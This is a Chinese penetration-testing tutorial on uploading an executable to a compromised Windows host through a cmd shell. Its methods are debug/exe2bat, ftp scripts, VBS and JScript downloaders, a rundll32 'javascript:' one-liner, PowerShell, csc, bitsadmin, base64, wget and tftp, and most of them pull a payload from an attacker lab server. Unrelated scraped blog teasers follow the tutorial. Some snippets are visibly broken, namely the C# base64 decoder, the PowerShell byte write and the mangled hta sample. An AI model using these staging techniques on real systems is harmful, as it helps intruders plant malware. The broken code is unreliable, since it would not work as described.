citelao

渗透技巧——通过cmd上传文件的N种方法

三好学生 · 2016/04/05 10:23

0x00 前言

在渗透测试的过程中，常常需要向目标主机上传文件，我在最近的学习测试过程中就碰到了这个问题，要求只能通过cmd shell向目标主机（Windows系统）上传文件，所以本文就对该技巧做一下总结。

图片来自于http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11754089/Hacker-remotely-crashes-Jeep-from-10-miles-away.html

0x02 测试环境

OS：Win7 x86
test exe：ssss2.exe,成功运行后输出1

0x03 通用上传方法

1、 debug

debug是一个程序调试工具，功能包括：

直接输入，更改，跟踪，运行汇编语言源程序
观察操作系统的内容
查看ROM BIOS的内容
观察更改RAM内部的设置值
以扇区或文件的方式读写软盘数据

特别的是它还有一个功能可以将十六进制代码转换为可执行文件：

结合本文的目标，思路如下：

把需要上传的exe转换成十六进制hex的形式
通过echo命令将hex代码写入文件
使用debug功能将hex代码还原出exe文件

实际测试：

kali中的exe2bat.exe提供了这个功能，位于/usr/share/windows-binaries

如图

操作步骤：

kali：

 
          cd 
           /usr/share/windows-binaries 
         
          wine exe2bat.exe ssss2.exe ssss2.txt

执行后会生成ssss2.txt，将里面的内容复制粘贴到cmd命令行下依次执行

执行后会生成1.dll、123.hex、ssss.exe

如图

注：
exe2bat不支持大于64kb的文件 debug默认只支持在32位系统

如图

2、ftp

搭建好ftp服务器：

ip:192.168.174.151
文件:ssss2.exe

按顺序执行如下代码即可通过ftp来下载文件

cmd：

 
          echo 
           open 
          192.168.174.151 21>  
          ftp 
          .txt 
         
          echo 
           ftp 
          >>  
          ftp 
          .txt 
         
          echo 
           bin >>  
          ftp 
          .txt 
         
          echo 
           ftp 
          >>  
          ftp 
          .txt 
         
          echo 
           GET ssss2.exe >>  
          ftp 
          .txt 
         
          ftp 
           -s: 
          ftp 
          .txt

如图

注：
初次使用ftp下载防火墙会弹框拦截，使用前记得要先添加防火墙规则

3、vbs

vbs downloader,使用msxml2.xmlhttp和adodb.stream对象

如下代码保存为.vbs文件：

 
          Set 
           Post = CreateObject( 
          "Msxml2.XMLHTTP" 
          ) 
         
          Set 
           Shell = CreateObject( 
          "Wscript.Shell" 
          ) 
         
          Post.Open  
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          ,0 
         
          Post.Send() 
         
          Set 
           aGet = CreateObject( 
          "ADODB.Stream" 
          ) 
         
          aGet.Mode = 3 
         
          aGet.Type = 1 
         
          aGet.Open() 
         
          aGet.Write(Post.responseBody) 
         
          aGet.SaveToFile  
          "C:\test\update\ssss2.exe" 
          ,2

对应到cmd下的命令为：

 
          echo 
           Set Post = CreateObject( 
          "Msxml2.XMLHTTP" 
          ) >>download.vbs 
         
          echo 
           Set Shell = CreateObject( 
          "Wscript.Shell" 
          ) >>download.vbs 
         
          echo 
           Post.Open  
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          ,0 >>download.vbs 
         
          echo 
           Post.Send() >>download.vbs 
         
          echo 
           Set aGet = CreateObject( 
          "ADODB.Stream" 
          ) >>download.vbs 
         
          echo 
           aGet.Mode = 3 >>download.vbs 
         
          echo 
           aGet.Type = 1 >>download.vbs 
         
          echo 
           aGet.Open() >>download.vbs 
         
          echo 
           aGet.Write(Post.responseBody) >>download.vbs 
         
          echo 
           aGet.SaveToFile  
          "C:\test\update\ssss2.exe" 
          ,2 >>download.vbs

按顺序依次执行后会生成download.vbs，然后执行download.vbs即可实现下载ssss2.exe

4、powershell

cmd：

 
          powershell ( 
          new-object 
          System.Net.WebClient).DownloadFile(  
          'http://192.168.174.145/ssss2.exe' 
          , 
          'C:\test\update\ssss2.exe' 
          )

5、csc

csc.exe是微软.NET Framework 中的C#编译器，Windows系统中默认包含，可在命令行下将cs文件编译成exe

c# downloader的代码为：

 
          using 
           System.Net; 
         
          namespace 
          downloader 
         
          { 
         
          class 
          Program 
         
          { 
         
          static 
          void 
          Main( 
          string 
          [] args) 
         
          { 
         
          WebClient client =  
          new 
          WebClient(); 
         
          string 
          URLAddress =  
          @"http://192.168.174.145/ssss2.exe" 
          ; 
         
          string 
          receivePath =  
          @"C:\test\update\" 
          ; 
         
          client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName 
         
          (URLAddress)); 
         
          } 
         
          } 
         
          }

使用echo将代码依次写入文件download.cs中，然后调用csc.exe编译cs文件

执行

 
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  
          /out 
          :C:\tes 
         
          t\update\download.exe C:\ 
          test 
          \update\download.cs

如图成功生成download.exe

注：
csc.exe的绝对路径要根据系统的.net版本来确定

6、JScript

相比于JSRat中用的Scripting.FileSystemObject

换用ADODB.Stream实现起来更加简单高效

以下代码依次保存为js文件，直接执行即可实现下载文件

 
          var 
           Object = WScript.CreateObject( 
          "MSXML2.XMLHTTP" 
          ); 
         
          Object.open( 
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          , 
          false 
          ); 
         
          Object.send(); 
         
          if 
           (Object.Status == 200) 
         
          { 
         
          var 
          Stream = WScript.CreateObject( 
          "ADODB.Stream" 
          ); 
         
          Stream.Open(); 
         
          Stream.Type = 1; 
         
          Stream.Write(Object.ResponseBody); 
         
          Stream.SaveToFile( 
          "C:\\test\\update\\ssss2.exe" 
          , 2); 
         
          Stream.Close(); 
         
          }

合并成rundll32的一句话（类似于JSRat的启动方式）：

cmd：

 
     
      
        
        
          rundll32.exe javascript: 
          "\..\mshtml,RunHTMLApplication " 
          ;document.write();Object=new%20ActiveXObject( 
          "Microsoft.XMLHTTP" 
          );Object. 
          open 
          ( 
          "GET" 
          , 
          "http://192.168.174.145/ssss2.exe" 
          , 
          false 
          );Object.send(); 
          if 
          (Object.Status==200){Stream=new%20ActiveXObject( 
          "ADODB.Stream" 
          );Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile( 
          "C:\\test\\update\\ssss2.exe" 
          ,2);Stream.Close();} 
         
 
      
 
     
   

执行后会提示没有权限，很有趣的地方，更多的细节会在以后的文章介绍

7、hta

添加最小化和自动退出hta程序的功能，执行过程中会最小化hta窗口，下载文件结束后自动退出hta程序

以下代码保存为.hta文件：

 
          "test" 
         
          WINDOWSTATE =  
          "minimize" 
          >

8、bitsadmin

bitsadmin是一个命令行工具，可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带

使用方法：

cmd下：

 
          bitsadmin  
          /transfer 
          n http: 
          //download 
          .sysinternals.com 
          /files/PSTools 
          .zip  C:\ 
          test 
          \update\PSTools.zip

下载成功如图：

注：
不支持https、ftp协议
使用kali的simplehttpserver作服务器会报错

9、base64

将exe先作base64加密，通过cmd上传后解密输出对exe作base64加密的方法：

（1）powershell

$PEBytes = [System.IO.File]::ReadAllBytes("C:\windows\system32\calc.exe")
$Base64Payload = [System.Convert]::ToBase64String($PEBytes)
Set-Content base64.txt -Value $Base64Payload

运行后会将C:\windows\system32\calc.exe作base64加密并输出到base64.txt

（2）c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\windows\system32\calc.exe");
            String AsBase64String = Convert.ToBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\base64.txt");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

(3)eml附件

（思路由猪猪侠提供）

server2003 默认包含outlook客户端C:\Program Files\Outlook Express

运行后-新建邮件-上传附件-另存为eml格式

使用notepad打开eml邮件，可看到加密的base64代码

如图

解密base64文件并生成exe的方法：

（1）powershell

$Base64Bytes = Get-Content (base64.txt)
$PEBytes= [System.Convert]::FromBase64String($Base64Bytes)
Set-Content calc.exe -Value $PEBytes

（2）c#

using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] AsBytes = File.ReadAllBytes(@"C:\test\base64.txt");
            String AsBase64String = Convert.FromBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\test\calc.exe");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}

注：读文件的操作可替换为base64代码直接写入脚本文件中

0x04 补充上传方法

以上均为系统默认包含的程序，结合以上方法并借助于第三方工具也能够实现功能

这里介绍的思路是可先通过bitsadmin来下载第三方工具，然后利用第三方工具进行传输文件

1、wget：

 
          bitsadmin  
          /transfer 
          n http: 
          //www 
          .interlog.com/~tcharron 
          /wgetwin-1_5_3_1-binary 
          .zip  C:\ 
          test 
          \update\wget.zip

运行后会下载wget的压缩包wget.zip

注：
Windows系统默认不包含解压缩zip文件的命令，但是可以通过vbs来实现解压缩zip文件

vbs实现解压缩：

以下代码保存为.vbs文件：

 
          UnZip  
          "C:\test\update\wget.zip" 
          ,"C:\test\update\wget\" 
         
          Sub 
           UnZip( 
          ByVal 
          myZipFile,  
          ByVal 
          myTargetDir) 
         
          Set 
          fso = CreateObject( 
          "Scripting.FileSystemObject" 
          ) 
         
          If 
          NOT fso.FileExists(myZipFile)  
          Then 
         
          Exit 
          Sub 
         
          ElseIf 
          fso.GetExtensionName(myZipFile) <>  
          "zip" 
          Then 
         
          Exit 
          Sub 
         
          ElseIf 
          NOT fso.FolderExists(myTargetDir)  
          Then 
         
          fso.CreateFolder(myTargetDir) 
         
          End 
          If 
         
          Set 
          objShell = CreateObject( 
          "Shell.Application" 
          ) 
         
          Set 
          objSource = objShell.NameSpace(myZipFile) 
         
          Set 
          objFolderItem = objSource.Items() 
         
          Set 
          objTarget = objShell.NameSpace(myTargetDir) 
         
          intOptions = 256 
         
          objTarget.CopyHere objFolderItem, intOptions 
         
          End 
           Sub

代码来自于http://demon.tw/programming/vbs-unzip-file.html

成功解压缩后就可通过wget.exe来传输文件

 
          C:\ 
          test 
          \update\wget\wget.exe http: 
          //192 
          .168.174.145 
          /ssss2 
          .exe

如图

2、ftfp

思路同上，先通过bitsadmin下载tftp.exe，然后利用tftp传输文件

 
          bitsadmin  
          /transfer 
          n http: 
          //www 
          .winagents.com 
          /downloads/tftp 
          .exe C:\ 
          test 
          \update\tftp.exe

下载成功后利用tftp传输文件：

 
          tftp -i 192.168.174.151 GET tftp\ssss2.exe C:\ 
          test 
          \update\ssss2.exe

注：
默认防火墙会拦截

关掉防火墙或者添加规则即可

如图

0x05 小结

本文对一些常用的通过cmd来传输文件的技巧做了整理，侧重于介绍其中较为通用简便的方法，所以并未介绍其他需要配置开发环境的实现方法，如Python、Ruby、Php等，如果你有更好的实现方法，欢迎与我交流，共同学习。

0x06 参考资料

http://ly0n.me/2015/10/21/uploading-files-to-compromised-systems/
https://blog.netspi.com/15-ways-to-download-a-file/
http://demon.tw/programming/vbs-download-file.html
http://demon.tw/programming/vbs-unzip-file.html

本文由三好学生原创并首发于乌云drops，转载请注明

你可能感兴趣的:(windows,三好大神)

Windows C盘清理技巧分享 qzw1210 windows
清理C盘是保持计算机性能和存储空间的关键步骤。C盘通常是系统盘，存储着操作系统和许多重要的系统文件，因此在清理时需要格外小心，以免误删重要文件。以下是一些详细的C盘清理技巧，帮助你有效释放空间。1.使用磁盘清理工具Windows自带的磁盘清理工具是清理C盘的首选工具。它可以安全地删除不必要的系统文件。步骤：打开“此电脑”。右键点击C盘，选择“属性”。点击“磁盘清理”按钮。在弹出的窗口中，选择要删除
明基PD2700U显示器无法调节图像模式橘子西瓜显示器 PD2700U 明基 BENQ
现象：明基PD2700U显示器无法调节图像模式，如下图：目前未找到根本原因，推测可能是下面的原因：1、安装了远程桌面软件：向日葵、虚拟显示器2、显卡插入了接口，但是没接显示器解决办法：电脑接入两个显示器，按Windows+P，切到其它模式，然后再切回来：然后就可以了：
PKI及SSL协议分析实验报告只会复制粘贴的 ssl https 服务器
PKI及SSL协议分析实验报告一、实验目的通过该实验了解和掌握证书服务的安装，理解证书的发放过程，掌握在WEB服务器上配置SSL，使用HTTPS协议访问网站以验证结果，最后对HTTPS协议进行分析。二、实验环境WindowServer*2本实验中自己指定CA服务器与申请证书的网站。实验过程中建议使用IE浏览器，如果不使用IE，可能会导致后续实验过程中证书不能下载。三、实验内容与实验要求实验内容、原
oracle数据库监听日志满了（4G）处理步骤 cyhysr oracle
现象：系统缓慢，新连接无法连接，执行查看监听状态命令时，响应缓慢且报错。遇到这些现象基本是监听日志已满，达到了4G。具体处理步骤如下：注意：本例为windows服务器，数据库oracle11g1、找到监听日志路径默认监听名为listener，直接在服务器中搜索listener.log文件。如果是windows服务器，且数据库安装在D盘，可参考如下路径：D:\app\Administrator\di
鸿蒙初学者学习手册(HarmonyOSNext_API14)_UIContext（@ohos.arkui.UIContext (UIContext)）余多多_zZ 学习 harmonyos 华为笔记
前言Context是鸿蒙中及其重要的Api包括了非常多的接口和功能，而且在官方文档中也是优先推荐使用Context中的接口在Stage模型中基本介绍1.UI实例与窗口的一一关联在Stage模型中，WindowStage或Window是用于管理窗口的类，它们通过loadContent接口加载页面内容。当调用loadContent时，系统会创建一个UI实例，这个实例是页面内容的具体表现形式，包括布局、
Burp Suite 的安装、证书安装导入及配置代理 He_Donglin 学习小结 web安全
一、BP安装1、在bp官方网站下载bp专业版链接：https://pan.baidu.com/s/1QQPT7yT3D88FEBt7XmtcOA提取码：w7hq2、安装java环境进入“20230304_BurpSuite_pro_v2023.2.2\20230304_BurpSuite_pro_v2023.2.2\javajdk17“文件下，双击运行”jdk-17.0.4_windows-x64
路由器配置DHCP服务器执笔忆长安网络网络协议负载均衡
文章目录前言1.DHCP的优点2.DHCP的使用3.DHCP的工作原理4.dhcp服务器实验总结前言DHCP（动态主机配置协议）是一个局域网的网络协议。指的是由服务器控制一段IP地址范围，客户机登录服务器时就可以自动获得服务器分配的IP地址和子网掩码。默认情况下，DHCP作为WindowsServer的一个服务组件不会被系统自动安装，还需要管理员手动安装并进行必要的配置。1.DHCP的优点1.简化
Blender布料模拟：衣物与织物_2024-07-15_10-44-29.Tex chenjj4003 游戏开发 blender 材质 3dsmax vr 贴图
Blender布料模拟：衣物与织物Blender基础设置安装与配置Blender安装Blender访问Blender官方网站下载适合您操作系统的版本。下载完成后，根据您的系统（Windows,macOS,Linux）进行安装。Windows:双击下载的.exe文件，按照提示完成安装。macOS:双击下载的.dmg文件，将Blender拖入您的应用程序文件夹。Linux:解压下载的.tar.xz文件
Git的详细使用方法 QMT量化交易 Python git
Git是一个分布式版本控制系统，用于跟踪和管理代码的变更。以下是Git的详细使用方法：1.安装GitWindows：从Git官网下载安装包。Linux（Ubuntu/Debian）sudoaptinstallgitmacOS：使用Homebrew。brewinstallgit验证安装git--version2.配置用户信息首次使用首次使用时，Git前需配置全局用户名和邮箱：gitconfig--g
解决Windows平台下 Visual Studio 中文显示乱码问题人生三渡 Visual Studio visual studio 代码规范预编码
目录常用编码格式介绍中文乱码的原因中文乱码的解决方式下载VisualStudio的扩展插件验证是否乱码问题是否解决常用编码格式介绍我们一般常用的就以下几种编码格式：GBK，UTF-8以及Unicode等。GBK：是一种汉字编码规范，它扩展了GB2312编码标准，增加了更多的汉字和符号。GBK详解UTF-8：是针对Unicode的一种可变长度字符编码。它可以用来表示Unicode标准中的任何字符，而
C++基础调用堆异常路奇怪 C++基础 c++
目录跨平台（C++23环境下）windows下可以极大地帮助解决在开发人员系统上无法重现的客户问题，并且调用了一个通用函数，您不知道它的调用者，因为它们很多。必须为客户提供一个可执行文件和一个使用该可执行文件构建的pdb，才能获得正确的调用堆栈。pdb文件包含调试符号。您不能提供稍后从同一代码构建的pdb。当我们构建可执行文件时，每个函数都有一个地址偏移量。pdb基于这些偏移量。再次生成二进制文件
Windows下工作组架构和域架构 weixin_33728708 数据库系统架构
工作组架构的网络工作组架构网络也被称为对等网络（peertopeer）域架构网络工作组架构网络域架构网络网络内每台计算机地位平等，资源和管理分散在各个计算机上网络内分为域控制器和成员服务器，如果有多台域控制器，则域控制器之间地位平等每台计算机都有一个本地安全账户管理器（SecurityAccountsManager,SAM）数据库，存储本地账户域内计算机共享一个集中的目录数据库（Directory
Windows域渗透之域管理人间酒中仙红队笔记之域渗透 windows 笔记学习网络安全域渗透红队笔记
Windows域管理一、使用组策略进行软件分发1、操作步骤2、PowerShell命令示例二、配置组策略（GPO）设置1、设置密码策略2、禁用USB存储设备三、批量用户管理1、创建单个用户2、批量导入用户四、部署和管理共享驱动器1、使用组策略登录脚本自动映射驱动器2、使用PowerShell映射网络驱动器五、管理Windows更新1、使用组策略配置自动更新2、使用PowerShell管理Windo
红蓝对抗之Windows内网渗透实战 wespten 网络安全AI+渗透测试代码审计等保全栈网络安全开发 windows
无论是渗透测试，还是红蓝对抗，目的都是暴露风险，促进提升安全水平。企业往往在外网布置重兵把守，而内网防护相对来说千疮百孔，所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进入内网，然后发起内网渗透。而国内外红蓝对抗服务和开源攻击工具大多数以攻击Windows域为主，主要原因是域控拥有上帝能力，可以控制域内所有员工电脑，进而利用员工的合法权限获取目标权限和数据，达成渗透目的。以蓝军攻击
本月之后，华为再无Windows PC，微软亲自“扶鸿蒙上马” 佳晓晓 pygame scikit-learn 网络 iphone vue.js
在当前中美博弈的复杂大环境下，华为这一科技巨头一直备受关注，近期更是传出重磅消息：微软对华为的Windows系统供货许可本月即将到期，且并无续约迹象。这意味着此后华为PC将无法再使用Windows系统，被迫全面转向国产方案，而鸿蒙PC系统则有望借此契机正式登上舞台。华为PC的现状与转变契机自去年8月华为上架MateBookGT14后，已有长达7个月的时间没有新品PC推出。这期间，华为PC的销量也受
《Windows API开发》：（一）Windows编程概述下雪就该搓雪球一些小玩意 windows
（一）Windows编程概述1、WindowsAPI简介2、Windows应用程序开发入门2.1、第一个实例程序3、WindowsAPI概要3.1、Windows数据类型3.2、WindowsAPI的功能分类4、WindowsAPI核心DLL5、Unicode和多字节5.1、字符串类型与其初始化5.2、W版本和A版本的API5.3、Unicode和ASCII的转换6、Windows程序设计规范的建
【第六节】windows sdk编程：Windows 中的资源攻城狮7号 Windows编程(C++)windows c++windows编程 windows sdk
引言资源是Windows应用程序图形用户界面（GUI）的重要组成部分，它们是应用程序中使用的各类数据，如光标、位图、图标、加速键、菜单、字符串和对话框等。这些数据在编译后会被包含在EXE文件中。虽然无法直接定位和操作资源，但可以通过相关函数来获取和操作这些资源。一、光标资源1.1应用程序操作光标资源的步骤（1）选择或创建光标形式可以使用Windows系统提供的光标，也可以通过图形编辑工具自定义光标
【小记】Windows7各版本下载链接敲键盘的Q windows
Windows7旗舰版简体中文64位文件名：cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso系统语言：简体中文磁力链接：ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/Win
Python多版本环境管理UV 坐吃山猪 Python python uv 开发语言
Python多版本环境管理UV1-参考网址Python虚拟环境UV管理工具-官网Python虚拟环境UV管理工具-快速开始pyproject.toml使用指导2-核心知识点1）python项目维护requirements.txt2）python机器学习环境Anaconda3）python轻量级环境管理uv4）uvx快速上手使用3-上手实操1-安装UV虚拟环境管理工具UV官网安装教程#Windows
windows下玩转vllm：在wsl下安装vllm后续，设置modelscope作为下载源几道之旅 Dify与Langflow 智能体（Agent）知识库人工智能
文章目录前言所涉及的之前的关键步骤解决模型权重下载网络不通畅的问题vllm和modelscope整合后的bug附录ImportError:cannotimportname'_try_login'from'modelscope.utils.hf_util'全部报错信息前言之前，咱们说了，由于windows不支持直接部署vllm，所以要么采用wsl，要么采用docker。我们目前尝试的是在wsl下进行
如何提高Flask的高并发性能 BirdMan98 Flask Python flask python 后端
提高Flask的并发性能可以从多个方面入手，主要包括服务器优化、数据库优化、代码优化和使用异步技术。下面详细介绍几种方法：1.使用高性能WSGI服务器Flask自带的开发服务器（flaskrun）不适用于生产环境。建议使用高性能WSGI服务器来运行Flask：推荐的WSGI服务器Gunicorn（推荐）：适用于LinuxWaitress：适用于WindowsuWSGI：适用于Linux，性能更强，
DeepSeek API 客户端使用文档老大白菜 python 人工智能数据库
1.简介deep.py是一个用于与DeepSeekAPI交互的Python客户端封装。它提供了简单易用的接口，支持对话历史管理、日志记录等功能，使得与DeepSeekAPI的交互更加便捷和可靠。2.功能特点简单的接口设计自动管理对话历史完整的日志记录灵活的配置选项异常处理机制3.安装依赖pipinstallopenai4.配置环境在项目根目录创建.env文件：#WindowssetDEEPSEEK
Qt+ffmpeg环境搭建技术不支持 qt ffmpeg 开发语言
Qt+ffmpeg环境搭建各平台常见视频开发库举例:iOS：AVFoundationAudioUnitAndroid：MediaPlayer，MediaCodecWindows：DirectShowLinux：GStreamerFFmpeg库是一个跨平台的视频开发库,还有libVLC也是一个跨平台的视频开发库掌握了其中一个库,也能很快上手其它库,因为音视频解码的原理类似引入FFmpeg库有两种方式
QT+FFmpeg+Windows开发环境搭建（加薪点） Qt历险记 Qt 高级开发工程师 qt ffmpeg windows
01、Windows环境搭建FFMPEG官网：http://ffmpeg.org/02、下载4.2.1版本源码源码：https://ffmpeg.org/releases/ffmpeg-4.2.1.tar.bz203、下载4.2.1编译好的文件下载已经编译好的FFMPEG）（迅雷下载很快）网址：https://ffmpeg.zeranoe.com/builds/32位下载地址：
Qt | Windows环境搭建ffmpeg Qt历险记 Qt 高级开发工程师 qt windows ffmpeg
点击上方"蓝字"关注我们FFMPEG官网>>>http://ffmpeg.org/【下载4.2.1版本源码】源码：https://ffmpeg.org/releases/ffmpeg-4.2.1.tar.bz2【下载4.2.1编译好的文件】下载已经编译好的FFMPEG网址：https://ffmpeg.zeranoe.com/builds/
一文掌握：Cursor新版本MCP配置全攻略（Windows与Mac篇） zhz5214 AI 人工智能 ai AI编程 AI写作程序员创富
随着Cursor0.46新版本的发布，对MCP（ModelContextProtocol）的支持为开发者带来了全新的功能体验。MCP作为一种开放标准协议，能够在数据源和AI驱动工具之间建立安全的双向连接，极大地拓展了AI的应用能力。接下来，我们就分别针对Windows和Mac环境，详细介绍MCP的配置方法。Windows环境下的MCP配置准备工作在开始配置前，请确保已经安装了Node.js。因为在
MySQL的双主互备 zhz5214 数据同步 mysql 数据库
参考：Windows下mysql双主搭建https://www.cnblogs.com/chenyixun/p/13810156.htmlMySQL的双机互备（又称为MySQL高可用）是一种数据库系统部署策略，可以实现在两台服务器之间实现高可用性和容错能力。具体而言，MySQL的双机互备将MySQL数据库部署在两台服务器上，其中一台作为主服务器（Master），另一台作为备用服务器（Slave）。
Apache Tomcat 9.0.37 压缩免安装版松京焕Max
ApacheTomcat9.0.37压缩免安装版apache-tomcat-9.0.37-windows-x64.zip项目地址:https://gitcode.com/open-source-toolkit/94318简介本仓库提供了一个经过压缩的ApacheTomcat9.0.37免安装版本。该版本无需复杂的安装步骤，解压后即可直接使用，非常适合快速部署和开发环境使用。资源文件文件名:apac
C# 检查系统是否开启 Hyper - V 东百牧码人 c#开发语言
C#检查系统是否开启Hyper-V在使用C#开发应用程序时，有时需要判断系统是否开启了Hyper-V功能。Hyper-V是Windows系统提供的一款虚拟化技术，以下为你介绍几种在C#中检查系统是否开启Hyper-V的方法。方法一：通过查询系统注册表原理Hyper-V的状态信息会存储在系统注册表中，我们可以通过读取注册表中的相关键值来判断Hyper-V是否开启。示例代码usingMicrosoft
PowerShell脚本编写君君学姐 powershell
在Windows开发环境中，PowerShell脚本编写是自动化工作流程的强大工具。PowerShell不仅提供了丰富的命令集来管理Windows系统，还支持脚本编写，允许开发者创建复杂的自动化任务来简化日常开发流程。以下将详细探讨如何使用PowerShell脚本自动化Windows开发工作流程，涵盖环境设置、依赖管理、代码编译、测试执行、部署以及持续集成/持续部署（CI/CD）等方面。一、环境设
mongodb3.03开启认证 21jhf mongodb
下载了最新mongodb3.03版本，当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题，现总结如下：（百度上搜到的基本都是老版本的，看到db.addUser的就是，请忽略） Windows下我做了一个bat文件，用来启动mongodb，命令行如下： mongod --dbpath db\data --port 27017 --directoryperdb --logp
【Spark103】Task not serializable bit1129 Serializable
Task not serializable是Spark开发过程最令人头疼的问题之一，这里记录下出现这个问题的两个实例，一个是自己遇到的，另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在，至少目前阶段碰到此类问题，没有什么章法 1. package spark.exampl
你所熟知的 LRU(最近最少使用) dalan_123 java
关于LRU这个名词在很多地方或听说，或使用，接下来看下lru缓存回收的实现 1、大体的想法 a、查询出最近最晚使用的项 b、给最近的使用的项做标记通过使用链表就可以完成这两个操作，关于最近最少使用的项只需要返回链表的尾部；标记最近使用的项，只需要将该项移除并放置到头部，那么难点就出现你如何能够快速在链表定位对应的该项？这时候多
Javascript 跨域周凡杨 JavaScript jsonp 跨域 cross-domain
linux下安装apache服务器 g21121 apache
安装apache 下载windows版本apache，下载地址：http://httpd.apache.org/download.cgi 1.windows下安装apache Windows下安装apache比较简单，注意选择路径和端口即可，这里就不再赘述了。 2.linux下安装apache：下载之后上传到linux的相关目录，这里指定为/home/apach
FineReport的JS编辑框和URL地址栏语法简介老A不折腾 finereport web报表报表软件语法总结
JS编辑框： 1.FineReport的js。作为一款BS产品，browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。大家知道，预览报表时，报表servlet会将cpt模板转为html，在这个html的head头部中会引入FineReport的js，这个finereport.js中包含了许多内置的fun
根据STATUS信息对MySQL进行优化墙头上一根草 status
mysql 查看当前正在执行的操作，即正在执行的sql语句的方法为: show processlist 命令 mysql> show global status;可以列出MySQL服务器运行各种状态值，我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
本文介绍如何给Spring的Bean配置文件的Bean定义别名？原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
高性能mysql 之性能剖析 annan211 性能 mysql mysql 性能剖析剖析
1 定义性能优化 mysql服务器性能，此处定义为响应时间。在解释性能优化之前，先来消除一个误解，很多人认为，性能优化就是降低cpu的利用率或者减少对资源的使用。这是一个陷阱。资源时用来消耗并用来工作的，所以有时候消耗更多的资源能够加快查询速度，保持cpu忙绿，这是必要的。很多时候发现编译进了新版本的InnoDB之后，cpu利用率上升的很厉害，这并不
主外键和索引唯一性约束百合不是茶索引唯一性约束主外键约束联机删除
目标;第一步;创建两张表用户表和文章表第二步;发表文章 1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
线程的调度 bijian1013 java 多线程 thread 线程的调度 java多线程
1. Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。 2. 多数线程的调度是抢占式的（即我想中断程序运行就中断，不需要和将被中断的程序协商） a)
查看日志常用命令 bijian1013 linux 命令 unix
一.日志查找方法，可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log 二.查看日志常用命令1.grep '关键字' error.log：在error.log中搜索'关键字'2.grep -C10 '关键字' error.log：显示关键字前后10行记录3.grep '关键字' error.l
【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
MyBatis这个系列的文章，主要参考《Java Persistence with MyBatis 3》。样例数据本文以MySQL数据库为例，建立一个STUDENTS表，插入两条数据，然后进行单表的增删改查 CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
【Hadoop十五】Hadoop Counter bit1129 hadoop
1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池　优化
近段时间，公司的检测中心报表系统(SMC)的开发人员时不时找到我，说用户老是出现无法登录的情况。前些日子因为手头上有Jboss集群的测试工作，发现用户不能登录时，都是在Tomcat中将这个项目Reload一下就好了，不过只是治标而已，因为大概几个小时之后又会再次出现无法登录的情况。今天上午，开发人员小毛又找到我，要我协助将这个问题根治一下，拖太久用户难保不投诉。简单分析了一
java-75-二叉树两结点的最低共同父结点 bylijinnan java
import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
行业垂直搜索引擎网页抓取项目 carlwu Lucene Nutch Heritrix Solr
公司有一个搜索引擎项目，希望各路高人有空来帮忙指导，谢谢！这是详细需求：（1）通过提供的网站地址(大概100-200个网站)，网页抓取程序能不断抓取网页和其它类型的文件（如Excel、PDF、Word、ppt及zip类型），并且程序能够根据事先提供的规则，过滤掉不相干的下载内容。（2）程序能够搜索这些抓取的内容，并能对这些抓取文件按照油田名进行分类，然后放到服务器不同的目录中。
[通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
降低通讯服务资费，就意味着有更多的用户进入，就意味着通讯服务提供商要接待和服务更多的用户，在总体运维成本没有由于技术升级而大幅下降的情况下，这种降低资费的行为将导致每个用户的平均带宽不断下降，而享受到的服务质量也在下降，这对用户和服务商都是不利的。。。。。。。。 &nbs
Java时区转换及时间格式 Cwind java
本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用，以及不同时区时间相互转化的方法和原理。问题描述：向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如，服务器位于东八区（北京时间，GMT+8:00），而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
readonly,只读，不可用 dashuaifu js jsp disable readOnly readOnly
